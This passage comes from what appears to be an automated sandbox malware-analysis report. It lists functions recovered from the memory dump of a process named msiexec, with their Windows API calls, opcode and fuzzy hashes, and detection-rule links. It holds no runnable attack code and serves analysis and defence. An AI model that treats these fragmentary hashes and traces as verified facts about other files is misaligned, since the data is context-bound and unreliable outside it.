                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3150196962-0
                                                                                                    • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                    • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                    Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                    • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                    • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                    Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1065087418-0
                                                                                                    • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                    • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                    Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1381354015-0
                                                                                                    • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                    • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                    Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2154303073-0
                                                                                                    • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                    • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                    Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3150196962-0
                                                                                                    • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                    • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 3154509469-0
                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                    Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4232544981-0
                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                    Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                    Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                    • String ID:
                                                                                                    • API String ID: 3859505661-0
                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                    Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                    Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                    Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                    Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                    Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
